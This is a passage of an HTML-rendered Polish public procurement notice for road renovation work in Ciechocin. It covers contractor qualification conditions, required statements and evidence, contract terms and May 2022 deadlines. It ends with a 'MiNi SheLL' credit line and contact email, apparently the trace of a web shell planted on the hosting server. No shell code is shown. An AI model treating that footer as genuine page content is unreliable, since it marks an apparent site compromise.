class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W przedmiotowym postępowaniu o udzielenie zamówienia publicznego, Zamawiający ustanawia nastę-pujące warunki udziału w postępowaniu:<br/>1)	warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie ustala minimalnych poziomów zdolności w tym zakresie. <br/><br/> W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofer-cie oświadczenie, o którym mowa w art. 125 ustawy Pzp, potwierdzające, że Wykonawca jest zare-jestrowanym operatorem telekomunikacyjnym. <br/><br/>2)	warunek dotyczący zdolności technicznej lub zawodowej<br/>Zamawiający ustanawia następujące minimalne poziomy zdolności:<br/>a) w zakresie doświadczenia:<br/>Wykonawca ubiegający się o udzielenie zamówienia winien wykazać wykonanie należycie, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończenie co najmniej jednego zamówienia/roboty budowlanej obejmującego remont lub przebudowę drogi o nawierzchni bitumicznej lub nawierzchni z kostki betonowej, o wartości nie mniejszej niż 1 000 000,00 mln zł brutto.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia Zamawiający wymaga, aby jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazał się wykonaniem co najmniej jednego zamówienia/roboty budowlanej, o której mowa powyżej. Dla Zamawiającego bowiem, w celu wykazania zdolności do wykonania zamówienia jest niezbędne to, aby Wykonaw-ca posiadał doświadczenie w wykonaniu minimum jednego przedsięwzięcia o wielkości i zakresie porównywalnym do robót stanowiących przedmiot zamówienia, gdyż takie doświadczenie pozwa-la na uznanie, że Wykonawca daje rękojmię jego należytego wykonania. <br/><br/><br/>Pod pojęciem drogi, Zamawiający rozumie drogi publiczne określone w ustawie z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz. U. z 2022 r. poz. 32.) lub drogi będące ich odpowiednikami w państwach Unii Europejskiej, państwach będących stronami Porozumienia Światowej Organizacji Handlu w sprawie zamówień rządowych i państwach będącymi stronami umów międzynarodo-wych, których stroną jest Unia Europejska.<br/>Jako wykonanie zamówienia należy rozumieć doprowadzenie co najmniej do wystawienia Świadec-twa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC), Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).<br/><br/><br/>W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofercie oświadczenie, o którym mowa w art. 125 ustawy Pzp. <br/>Natomiast na wezwanie Zamawiającego, o którym mowa w art. 274 ust. 1 ustawy Pzp Wykonawca będzie zobowiązany do przedłożenia wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wyko-nawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpo-wiednie dokumenty.<br/>Wzór wykazu stanowi załącznik nr 5 do SWZ.<br/><br/><br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/><br/>b) w zakresie dysponowania osobami zdolnymi do wykonania zamówienia:<br/><br/>Zamawiający wymaga aby Wykonawca wykazał się dysponowaniem na czas realizacji zamówienia: <br/>Kierownikiem budowy, spełniającym następujące wymagania:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności;<br/>	posiada doświadczenie polegające na realizowaniu, jako kierownik budowy lub kierownik robót drogowych minimum jedną robotę budowlaną polegającą na remoncie lub przebu-dowie drogi o wartości robót budowlanych nie mniejszej niż 1 000 000,00 zł brutto. <br/><br/><br/>W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofercie oświadczenie, o którym mowa w art. 125 ustawy Pzp. <br/><br/>Natomiast na wezwanie Zamawiającego, o którym mowa w art. 274 ust. 1 ustawy Pzp Wykonawca będzie zobowiązany do przedłożenia wykazu osób, skierowanych przez wykonawcę do realizacji za-mówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 6 do SWZ.<br/><br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/> <br/>3)	warunek dotyczący sytuacji ekonomicznej lub finansowej Zamawiający ustanawia następujące mi-nimalne poziomy zdolności w odniesieniu do zamówienia:<br/><br/>Zamawiający nie ustala minimalnych poziomów zdolności w tym zakresie. <br/><br/> W celu wykazania spełniania warunku udziału w postępowaniu, każdy z Wykonawców składa w ofer-cie oświadczenie, o którym mowa w art. 125 ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt 1 lit. a i b, oraz pkt 2 Rozporządzenia w sprawie podmiotowych środków dowodowych, żąda oświad-czenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego tj. podstaw, o których mowa w art. 108 ust. 1 pkt 1- 2, art. 108 ust. 1 pkt 4 w zakresie orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karne-go, art. 108 ust. 1 pkt 5 w zakresie braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę czę-ściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przy-należności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwier-dzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapita-łowej;<br/><br/>- oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskaza-nych przez zamawiającego, o których mowa w:<br/>art. 108 ust. 1 pkt 3 ustawy,<br/>art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie pu-bliczne tytułem środka zapobiegawczego,<br/>art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W postępowaniu Zamawiający wymaga złożenia następujących podmiotowych środków dowodo-wych:<br/>1)	środki dowodowe składane wraz z ofertą (w zakresie wskazanym przez Zamawiającego):<br/>a)	oświadczenie o niepodleganiu wykluczeniu, zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ,<br/>b)	oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem stanowią-cym załącznik nr 3 do SWZ.<br/><br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o którym mowa w pkt 1, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wyklu-czenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonaw-ców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w pkt 1, także oświadczenie pod-miotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby - wzór oświadczenia stanowi zał. nr 3a do SWZ. <br/><br/>2)	środki dowodowe, składane na wezwanie Zamawiającego, o którym mowa w art. 274 ustawy Pzp: <br/>Stosownie do treści art. 274 ust. 1 ustawy Pzp, Zamawiający będzie żądał od Wykonawcy, którego oferta została najwyżej oceniona, złożenia następujących podmiotowych środków dowodowych:<br/>a)	w celu wykazania minimalnych zdolności, określonych w Rozdziale XI ust. 1 pkt 2) lit. a SWZ, wezwany Wykonawca zobowiązany jest do złożenia wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmio-tów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty bu-dowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty Wzór wykazu stanowi za-łącznik nr 5 do SWZ.<br/><br/>b)	w celu wykazania minimalnych zdolności, określonych w Rozdziale XI ust. 1 pkt 2) lit. b) SWZ, wezwany Wykonawca zobowiązany jest do złożenia wykazu osób, skierowanych przez wyko-nawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadcze-nie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na te-mat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, warunek o którym mowa w ust.<br/>1 pkt 1, 2 i 3 dopuszczalne jest wspólne wykazywanie spełniania warunku udziału w postępowaniu. Nie ustanawia się<br/>szczegółowego sposobu spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków<br/>udziału w postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymaga-ne.<br/>W przypadku Wykonawców wspólnie ubiegający się o udzielenie zamówienia, Wykonawcy dołączają odpowiednio do oferty<br/>oświadczenie, z którego wynika, które dostawy lub usługi wykonają poszcze-gólni Wykonawcy. Tekst oświadczenia znajduje<br/>się w treści załącznika nr 3 do SWZ.<br/>Dopuszczalne jest poleganie na zasobach innego podmiotu w celu wykazania spełniania warunków udziału w postępowaniu.<br/>Tym samym Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych<br/>sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty<br/>jako najkorzystniejszej) przedstawiają Zamawiającemu umowę, regulującą współpracę, tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści<br/>wybranej oferty w zakresie uregulowanym w art. 454 – 455 ustawy Pzp oraz wskazanym we<br/>Wzorze umowy stanowiącym Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com